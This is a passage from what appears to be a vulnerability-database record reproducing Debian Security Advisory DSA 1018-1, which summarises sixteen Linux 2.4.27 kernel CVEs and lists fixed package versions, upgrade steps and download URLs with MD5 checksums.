"RHSA-2006:0190", "RHSA-2005:283"]}, {"type": "centos", "idList": ["CESA-2006:0140", "CESA-2006:0191-01", "CESA-2006:0101", "CESA-2005:283-01"]}, {"type": "osvdb", "idList": ["OSVDB:20676", "OSVDB:12562", "OSVDB:21283", "OSVDB:21516", "OSVDB:11015", "OSVDB:20061", "OSVDB:17479", "OSVDB:21285", "OSVDB:22215", "OSVDB:18978"]}, {"type": "suse", "idList": ["SUSE-SA:2006:012", "SUSE-SA:2005:068", "SUSE-SA:2005:067", "SUSE-SA:2005:050"]}, {"type": "exploitdb", "idList": ["EDB-ID:26648", "EDB-ID:26353", "EDB-ID:26382", "EDB-ID:26489"]}, {"type": "seebug", "idList": ["SSV:4214", "SSV:80123", "SSV:4213", "SSV:4215", "SSV:80020"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:23E2E247CAD4740C7EF7045F684CEA3D", "EXPLOITPACK:16647E5594ED181F7D7B260061A8238D"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:9541", "SECURITYVULNS:DOC:8194", "SECURITYVULNS:DOC:9632", "SECURITYVULNS:DOC:10474"]}, {"type": "gentoo", "idList": ["GLSA-200408-24"]}], "modified": "2019-05-30T02:21:32", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2019-05-30T02:21:32", "rev": 2}, "vulnersScore": 7.6}, "affectedPackage": [], "scheme": null}
{"debian": [{"lastseen": "2020-11-11T13:15:47", "bulletinFamily": "unix", "cvelist": ["CVE-2004-1058", "CVE-2005-3783", "CVE-2005-2457", "CVE-2005-3858", "CVE-2004-0887", "CVE-2005-4618", "CVE-2005-3806", "CVE-2005-3257", "CVE-2005-3848", "CVE-2005-1761", "CVE-2005-2709", "CVE-2005-2973", "CVE-2004-2607", "CVE-2005-0449", "CVE-2005-3857", "CVE-2005-2555"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1018-1 security@debian.org\nhttp://www.debian.org/security/ Dann Frazier, Simon Horman\nMarch 26th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-source-2.4.27\nVulnerability : several\nProblem-Type : local/remote\nDebian-specific: no\nCVE IDs : CVE-2004-0887 CVE-2004-1058 CVE-2004-2607 CVE-2005-0449 CVE-2005-1761 CVE-2005-2457 CVE-2005-2555 CVE-2005-2709 CVE-2005-2973 CVE-2005-3257 CVE-2005-3783 CVE-2005-3806 CVE-2005-3848 CVE-2005-3857 CVE-2005-3858 CVE-2005-4618\n\nSeveral local and remote vulnerabilities have been discovered in the Linux\nkernel that may lead to a denial of service or the execution of arbitrary\ncode. The Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\nCVE-2004-0887\n\n Martin Schwidefsky discovered that the privileged instruction SACF (Set\n Address Space Control Fast) on the S/390 platform is not handled properly, \n allowing for a local user to gain root privileges.\n\nCVE-2004-1058\n\n A race condition allows for a local user to read the environment variables\n of another process that is still spawning through /proc/.../cmdline.\n\nCVE-2004-2607\n\n A numeric casting discrepancy in sdla_xfer allows local users to read\n portions of kernel memory via a large len argument which is received as an\n int but cast to a short, preventing read loop from filling a buffer.\n\nCVE-2005-0449\n \n An error in the skb_checksum_help() function from the netfilter framework\n has been discovered that allows the bypass of packet filter rules or\n a denial of service attack.\n\nCVE-2005-1761\n\n A vulnerability in the ptrace subsystem of the IA-64 architecture can \n allow local attackers to overwrite kernel memory and crash the kernel.\n\nCVE-2005-2457\n\n Tim Yamin discovered that insufficient input validation in the compressed\n ISO file system (zisofs) allows a denial of service attack through\n maliciously crafted ISO images.\n\nCVE-2005-2555\n\n Herbert Xu discovered that the setsockopt() function was not restricted to\n users/processes with the CAP_NET_ADMIN capability. This allows attackers to\n manipulate IPSEC policies or initiate a denial of service attack. \n\nCVE-2005-2709\n\n Al Viro discovered a race condition in the /proc handling of network devices.\n A (local) attacker could exploit the stale reference after interface shutdown\n to cause a denial of service or possibly execute code in kernel mode.\n\nCVE-2005-2973\n \n Tetsuo Handa discovered that the udp_v6_get_port() function from the IPv6 code\n can be forced into an endless loop, which allows a denial of service attack.\n\nCVE-2005-3257\n\n Rudolf Polzer discovered that the kernel improperly restricts access to the\n KDSKBSENT ioctl, which can possibly lead to privilege escalation.\n\nCVE-2005-3783\n\n The ptrace code using CLONE_THREAD didn't use the thread group ID to\n determine whether the caller is attaching to itself, which allows a denial\n of service attack.\n\nCVE-2005-3806\n\n Yen Zheng discovered that the IPv6 flow label code modified an incorrect variable,\n which could lead to memory corruption and denial of service.\n\nCVE-2005-3848\n\n Ollie Wild discovered a memory leak in the icmp_push_reply() function, which\n allows denial of service through memory consumption.\n\nCVE-2005-3857\n\n Chris Wright discovered that excessive allocation of broken file lock leases\n in the VFS layer can exhaust memory and fill up the system logging, which allows\n denial of service.\n\nCVE-2005-3858\n\n Patrick McHardy discovered a memory leak in the ip6_input_finish() function from\n the IPv6 code, which allows denial of service.\n\nCVE-2005-4618\n\n Yi Ying discovered that sysctl does not properly enforce the size of a\n buffer, which allows a denial of service attack.\n\nThe following matrix explains which kernel version for which architecture\nfix the problems mentioned above:\n\n Debian 3.1 (sarge)\n Source 2.4.27-10sarge2\n Alpha architecture 2.4.27-10sarge2\n ARM architecture 2.4.27-2sarge2\n Intel IA-32 architecture 2.4.27-10sarge2\n Intel IA-64 architecture 2.4.27-10sarge2\n Motorola 680x0 architecture 2.4.27-3sarge2\n Big endian MIPS architecture 2.4.27-10.sarge1.040815-2\n Little endian MIPS architecture 2.4.27-10.sarge1.040815-2\n PowerPC architecture 2.4.27-10sarge2\n IBM S/390 architecture 2.4.27-2sarge2\n Sun Sparc architecture 2.4.27-9sarge2\n\nThe following matrix lists additional packages that were rebuilt for\ncompatability with or to take advantage of this update:\n\n Debian 3.1 (sarge)\n kernel-latest-2.4-alpha 101sarge1\n kernel-latest-2.4-i386 101sarge1\n kernel-latest-2.4-s390 2.4.27-1sarge1\n kernel-latest-2.4-sparc 42sarge1\n kernel-latest-powerpc 102sarge1\n fai-kernels 1.9.1sarge1\n i2c 1:2.9.1-1sarge1\n kernel-image-speakup-i386 2.4.27-1.1sasrge1\n lm-sensors 1:2.9.1-1sarge3\n mindi-kernel 2.4.27-2sarge1\n pcmcia-modules-2.4.27-i386 3.2.5+2sarge1\n systemimager 3.2.3-6sarge1\n\nWe recommend that you upgrade your kernel package immediately and reboot\nthe machine. If you have built a custom kernel from the kernel source\npackage, you will need to rebuild to take advantage of these fixes.\n\nThis update introduces a change in the kernel's binary interface, the affected\nkernel packages inside Debian have been rebuilt, if you're running local addons\nyou'll need to rebuild these as well.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get dist-upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-source-2.4.27_2.4.27-10sarge2.diff.gz\n Size/MD5 checksum: 713256 04938bd9582171f13459f40245fdb402\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-alpha/kernel-latest-2.4-alpha_101sarge1.dsc\n Size/MD5 checksum: 685 8d2419804b5d12e4602271c26dcad450\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge3.dsc\n Size/MD5 checksum: 1089 13968c7c9bb075bad3b2cb95feef384c\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-patch-powerpc-2.4.27_2.4.27-10sarge2.dsc\n Size/MD5 checksum: 1129 4396133a6b96b9dbceb66d2a48852d88\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge3.diff.gz\n Size/MD5 checksum: 32931 119d0d836ed566e15624f809701d0ab9\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-latest-2.4-i386_101sarge1.dsc\n Size/MD5 checksum: 1345 1a4ebdb73d7bd94d2b0d51b75f5451cc\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-image-2.4.27-alpha_2.4.27-10sarge2.tar.gz\n Size/MD5 checksum: 30119 0df45f3ce9d32988eed0d9567cf0b4fa\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-ia64_2.4.27-10sarge2.tar.gz\n Size/MD5 checksum: 53307 d8a5d2061c0790cfd9467864502818e3\n http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-i386_3.2.5+2sarge1.tar.gz\n Size/MD5 checksum: 101556 397541e2aa7fc958a4852dffa6c8d1fb\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-sparc_2.4.27-9sarge2.dsc\n Size/MD5 checksum: 1074 ba4f46144c5db2a3c76358689fdb0185\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-arm_2.4.27-2sarge2.tar.gz\n Size/MD5 checksum: 32208 71392893f2e012ffafaab2bb43f8e488\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-s390_2.4.27-2sarge2.dsc\n Size/MD5 checksum: 831 687b8a0516c44a1527a90f5df5c772ab\n http://security.debian.org/pool/updates/main/s/systemimager/systemimager_3.2.3-6sarge1.tar.gz\n Size/MD5 checksum: 15975115 9fd8b15f9f92314ea9cea3f22a77ec5b\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-arm_2.4.27-2sarge2.dsc\n Size/MD5 checksum: 839 878a7971258f25a1c17fdb6362e9909f\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-source-2.4.27_2.4.27-10sarge2.dsc\n Size/MD5 checksum: 900 efe323453f0dc718c6d9490ca3ca691e\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-latest-2.4-i386_101sarge1.tar.gz\n Size/MD5 checksum: 2617 cf7e82afaef00b0cf93521fdccf4ed5c\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-latest-2.4-sparc_42sarge1.tar.gz\n Size/MD5 checksum: 2231 974f4d59d2e4e0909a941364a49edb7a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-m68k_2.4.27-3sarge2.tar.gz\n Size/MD5 checksum: 9841 53b6e1fe5e9060c93ef9ff91cedf490f\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-ia64_2.4.27-10sarge2.dsc\n Size/MD5 checksum: 1143 9cc5658049d0158385bc82424ab75361\n http://security.debian.org/pool/updates/main/m/mindi-kernel/mindi-kernel_2.4.27.orig.tar.gz\n Size/MD5 checksum: 9501 a4ad085824ade5641f1c839d945dd301\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-s390/kernel-latest-2.4-s390_2.4.27-1sarge1.tar.gz\n Size/MD5 checksum: 1597 fcbb9bc6a69ad10f0712ea03cad557ef\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-latest-2.4-sparc_42sarge1.dsc\n Size/MD5 checksum: 846 2844d7d598b4fb3d35d418ff2858099c\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-alpha/kernel-latest-2.4-alpha_101sarge1.tar.gz\n Size/MD5 checksum: 1950 c4a4fbe2095a7d43cf6b33cc9c73f372\n http://security.debian.org/pool/updates/main/m/mindi-kernel/mindi-kernel_2.4.27-2sarge1.diff.gz\n Size/MD5 checksum: 2786 a0a40636362e7f5c03ffae5fca94edbd\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-patch-powerpc-2.4.27_2.4.27-10sarge2.tar.gz\n Size/MD5 checksum: 1462678 eab044878df015bbf85329c2498ed8e8\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-sparc_2.4.27-9sarge2.tar.gz\n Size/MD5 checksum: 20216 0ae4467cf28f4a513e68c2d6ba413d9b\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-i386_2.4.27-10sarge2.tar.gz\n Size/MD5 checksum: 97376 1a3af863ee67797a398cc33c1b3fcf3c\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-i386_2.4.27-10sarge2.dsc\n Size/MD5 checksum: 1581 53d1f65a236f842d634d2f472d761792\n http://security.debian.org/pool/updates/main/i/i2c/i2c_2.9.1-1sarge1.dsc\n Size/MD5 checksum: 857 6c617b10e65d623d40a8c5d6d89107f9\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-s390_2.4.27-2sarge2.tar.gz\n Size/MD5 checksum: 8212 0598b1ff05e1d4dd4c434a39c9f018a6\n http://security.debian.org/pool/updates/main/m/mindi-kernel/mindi-kernel_2.4.27-2sarge1.dsc\n Size/MD5 checksum: 750 4d8bed84c0e377a458977c40ef253a64\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1.orig.tar.gz\n Size/MD5 checksum: 870765 f5af615e39441d95471bdb72a3f01709\n http://security.debian.org/pool/updates/main/s/systemimager/systemimager_3.2.3-6sarge1.dsc\n Size/MD5 checksum: 1012 0fcee4cf17e43873f37e6920aa11dd1c\n http://security.debian.org/pool/updates/main/k/kernel-image-speakup-i386/kernel-image-speakup-i386_2.4.27-1.1sarge1.dsc\n Size/MD5 checksum: 732 99407eb60a651fe0d937fc9ce0942885\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-source-2.4.27_2.4.27.orig.tar.gz\n Size/MD5 checksum: 38470181 56df34508cdc47a53d15bc02ffe4f42d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-m68k_2.4.27-3sarge2.dsc\n Size/MD5 checksum: 875 9af3fd80b96a54759a11563dc735f349\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-image-2.4.27-alpha_2.4.27-10sarge2.dsc\n Size/MD5 checksum: 831 fb35a83abc577050eefca213f1c1e5ef\n http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-i386_3.2.5+2sarge1.dsc\n Size/MD5 checksum: 825 5ddcf45bf8e95a7f1004e6ad97d9502e\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-patch-2.4.27-mips_2.4.27-10.sarge2.040815-1.tar.gz\n Size/MD5 checksum: 307908 19a86536a0b624c16cb95e6277510eeb\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-s390/kernel-latest-2.4-s390_2.4.27-1sarge1.dsc\n Size/MD5 checksum: 663 32e3700237d6c8399991db0cb219ca2b\n http://security.debian.org/pool/updates/main/i/i2c/i2c_2.9.1.orig.tar.gz\n Size/MD5 checksum: 142961 eb3d1df2d3b46f199af2485db612c76d\n http://security.debian.org/pool/updates/main/k/kernel-image-speakup-i386/kernel-image-speakup-i386_2.4.27-1.1sarge1.tar.gz\n Size/MD5 checksum: 16651 4681c5a0ef28cf92bc861a477859f424\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-patch-2.4.27-mips_2.4.27-10.sarge2.040815-1.dsc\n Size/MD5 checksum: 1051 1063b480da66a98327389106a60fd1de\n http://security.debian.org/pool/updates/main/i/i2c/i2c_2.9.1-1sarge1.diff.gz\n Size/MD5 checksum: 9623 3900d3b14fc77579eb661dac9d7becdb\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-patch-debian-2.4.27_2.4.27-10sarge2_all.deb\n Size/MD5 checksum: 671384 656244ac0eeb0edfd0eec5cf80526303\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-source_2.9.1-1sarge3_all.deb\n Size/MD5 checksum: 945646 e1bc68ea39ee276dfb3a24318c8aa765\n http://security.debian.org/pool/updates/main/k/kernel-image-speakup-i386/kernel-doc-2.4.27-speakup_2.4.27-1.1sarge1_all.deb\n Size/MD5 checksum: 2418378 cebb78cbbb3762c243f99b86884cc5ac\n http://security.debian.org/pool/updates/main/s/systemimager/systemimager-boot-ia64-standard_3.2.3-6sarge1_all.deb\n Size/MD5 checksum: 9542922 f8049a1e8cee07d0e2a1fdc7357e252a\n http://security.debian.org/pool/updates/main/s/systemimager/systemimager-boot-i386-standard_3.2.3-6sarge1_all.deb\n Size/MD5 checksum: 4758102 b469e5a3b6bc93a459274310199899a7\n http://security.debian.org/pool/updates/main/i/i2c/i2c-source_2.9.1-1sarge1_all.deb\n Size/MD5 checksum: 159912 1c1283ab19292c86be4fa765840eff13\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-doc-2.4.27_2.4.27-10sarge2_all.deb\n Size/MD5 checksum: 3578772 5b413310b3826dec3f0113e1215ca51f\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-tree-2.4.27_2.4.27-10sarge2_all.deb\n Size/MD5 checksum: 25710 12d938fd6fe17432924452f0f8ae039f\n http://security.debian.org/pool/updates/main/s/systemimager/systemimager-common_3.2.3-6sarge1_all.deb\n Size/MD5 checksum: 29630 81379a2aae787fcb85eb937cffb8e62e\n http://security.debian.org/pool/updates/main/s/systemimager/systemimager-doc_3.2.3-6sarge1_all.deb\n Size/MD5 checksum: 630106 3557f0934650e872d93b88b5150f9815\n http://security.debian.org/pool/updates/main/i/i2c/kernel-patch-2.4-i2c_2.9.1-1sarge1_all.deb\n Size/MD5 checksum: 106132 81b855594bb23ab228c447f2f5343c8e\n http://security.debian.org/pool/updates/main/s/systemimager/systemimager-server_3.2.3-6sarge1_all.deb\n Size/MD5 checksum: 115340 5e1b98b83d853a2a0c24695ff1c82251\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-source-2.4.27_2.4.27-10sarge2_all.deb\n Size/MD5 checksum: 31030888 b556d3b35835290ef34e01c23b0dfb7b\n http://security.debian.org/pool/updates/main/s/systemimager/systemimager-client_3.2.3-6sarge1_all.deb\n Size/MD5 checksum: 29366 b65b98e266e64ff2a5cdd74558a0a922\n http://security.debian.org/pool/updates/main/s/systemimager/systemimager-server-flamethrowerd_3.2.3-6sarge1_all.deb\n Size/MD5 checksum: 14680 d45c6cd85a3bb2d3388d9bbe6cc422e5\n http://security.debian.org/pool/updates/main/l/lm-sensors/kernel-patch-2.4-lm-sensors_2.9.1-1sarge3_all.deb\n Size/MD5 checksum: 304520 cad3f6be07e47fc9163882225608a2c5\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-headers-2.4.27-3_2.4.27-10sarge2_alpha.deb\n Size/MD5 checksum: 4572390 9d8b171c601c6aa551bcb9a2be6862f1\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-alpha/kernel-image-2.4-smp_101sarge1_alpha.deb\n Size/MD5 checksum: 1986 bda45dedcf2b5ed4f6b8d030f18e11b6\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-alpha/kernel-image-2.4-generic_101sarge1_alpha.deb\n Size/MD5 checksum: 1982 7ee85d7e5e2753a2b379de867c127c78\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-image-2.4.27-3-generic_2.4.27-10sarge2_alpha.deb\n Size/MD5 checksum: 16518544 b49f831395ee62bde73f0aad25ddd438\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-image-2.4.27-3-smp_2.4.27-10sarge2_alpha.deb\n Size/MD5 checksum: 16968168 db461b6d5cfb842ead1420c0edb61f99\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-headers-2.4.27-3-generic_2.4.27-10sarge2_alpha.deb\n Size/MD5 checksum: 270900 5e321af02b9c205f38bbc4be49fbc9a8\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-alpha/kernel-headers-2.4-generic_101sarge1_alpha.deb\n Size/MD5 checksum: 1980 475f0b3c517d16740be06abbc4e3d4a9\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-build-2.4.27-3_2.4.27-10sarge2_alpha.deb\n Size/MD5 checksum: 5732 43ca0eeaab913f6faef8eb5a2f432741\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-headers-2.4.27-3-smp_2.4.27-10sarge2_alpha.deb\n Size/MD5 checksum: 272828 9c7e1914da800e5e98fd6336c9ad6060\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-alpha/kernel-headers-2.4-smp_101sarge1_alpha.deb\n Size/MD5 checksum: 1980 6da3aab7853283f763332efde9619e7c\n\n ARM architecture:\n \n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-headers-2.4.27_2.4.27-2sarge2_arm.deb\n Size/MD5 checksum: 4657792 6efae5dc812abfc779c02c402df0fd3d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-riscpc_2.4.27-2sarge2_arm.deb\n Size/MD5 checksum: 3142828 79bb6bed414464dfb134ca5be8eb0d9a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-riscstation_2.4.27-2sarge2_arm.deb\n Size/MD5 checksum: 3665410 a91d34d5ddf87dfb43d2fa1252679d70\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-netwinder_2.4.27-2sarge2_arm.deb\n Size/MD5 checksum: 7330418 38c4e7edaf85174e42c1a0272cd71090\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-lart_2.4.27-2sarge2_arm.deb\n Size/MD5 checksum: 1054774 e098137f0ef0d731443810ee9eaed718\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-build-2.4.27_2.4.27-2sarge2_arm.deb\n Size/MD5 checksum: 463856 eaa7abc8f41e6e10ca123b8c27f348a9\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-bast_2.4.27-2sarge2_arm.deb\n Size/MD5 checksum: 1689532 d636ec6606fd50d41fc4f6f5e5d5e103\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-speakup-i386/kernel-image-2.4.27-speakup_2.4.27-1.1sarge1_i386.deb\n Size/MD5 checksum: 11302740 d57ff9246788c39d98903f7b3270fabd\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 1823622 2acb45e3fed2a4d7f2e952a258864081\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-686_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 12338568 be29794a003a05edc00e3a03d34b3eea\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-686-smp_101sarge1_i386.deb\n Size/MD5 checksum: 2286 4b863896be1e22d0c1005131b8f9bfec\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-k6_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 258984 f0ca8379fd4fe3e7bd07480630d01b05\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-k6_101sarge1_i386.deb\n Size/MD5 checksum: 2158 b17c62827446c35c0e8f787a262aa180\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-586tsc_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 298250 836b9106a35174e7232c018cd2d2c71a\n http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-k7_3.2.5+2sarge1_i386.deb\n Size/MD5 checksum: 477580 24ef30a122508783dc22e87a43923e45\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-386_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 11049922 6548a659a11435f1b6ebcefd850c7b69\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-k7-smp_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 299950 27e5ee810fc890b649ad25cc2edff073\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-386_101sarge1_i386.deb\n Size/MD5 checksum: 2168 1b80507c432362c471b60ee18b47d0b4\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-586tsc_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 258980 cf019b62e65a17b0ed20e149faa44559\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-386_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 267748 9555f73de465bd2114d0caf2a41acff2\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-686-smp_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 259572 9505af261ada93ee26c66a3fb0d7d82e\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-586tsc_101sarge1_i386.deb\n Size/MD5 checksum: 2164 ac150587b9d3f22de309ea312f11c321\n http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-686-smp_3.2.5+2sarge1_i386.deb\n Size/MD5 checksum: 484192 c46d1f7e98b6b3e625158ddaca907951\n http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-386_3.2.5+2sarge1_i386.deb\n Size/MD5 checksum: 477610 61f0e8d1bd3dcbf8447a15f3986710ce\n http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-586tsc_3.2.5+2sarge1_i386.deb\n Size/MD5 checksum: 477644 302afa94885da8c4f143b8f5aa3476b0\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-k7_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 292198 ff62442bd8a017f09636faa7087eaf08\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-386_101sarge1_i386.deb\n Size/MD5 checksum: 2176 8f3ad5ed0dc40fc3d9427412798905ca\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-686_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 298386 aae34ecc6770f907d0b7de0e7203fac6\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-386_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 297322 bd2931acac7b7e82b240031b76dbb2a0\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-686_101sarge1_i386.deb\n Size/MD5 checksum: 2214 b0da0d519fee471f1445bcec8e1072c3\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-586tsc_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 12025684 071b3edb763ba490c0101452d467c8a1\n http://security.debian.org/pool/updates/main/m/mindi-kernel/mindi-kernel_2.4.27-2sarge1_i386.deb\n Size/MD5 checksum: 7765638 f8e51efba0f3cb10b658e01e12c6b9bb\n http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-386_2.9.1-1sarge1_i386.deb\n Size/MD5 checksum: 77860 2412ecaf415f28cedf1594fc5853a59d\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-386_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 258984 1e42dac94e18a442204e159252730d5e\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-k7-smp_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 297106 adfdcbda85639abcd9d387baa6779ef1\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-k7-smp_101sarge1_i386.deb\n Size/MD5 checksum: 2250 c1d2ec30560223773db6fb3fb5f68260\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-586tsc_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 292582 4cc3a32beb6a18a7b8c97f0e174f7eb6\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-k7-smp_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 12417806 4fbf262234903a4eac5f36b2a8a0b11e\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-k7_101sarge1_i386.deb\n Size/MD5 checksum: 2158 a83bda3df1131288d169b1c44d2f6f95\n http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-686_3.2.5+2sarge1_i386.deb\n Size/MD5 checksum: 477608 0dfded776cb25f87885f3e2cd54139fb\n http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-k6_2.9.1-1sarge1_i386.deb\n Size/MD5 checksum: 77586 7a73742b7405143708835f3932f9fa70\n 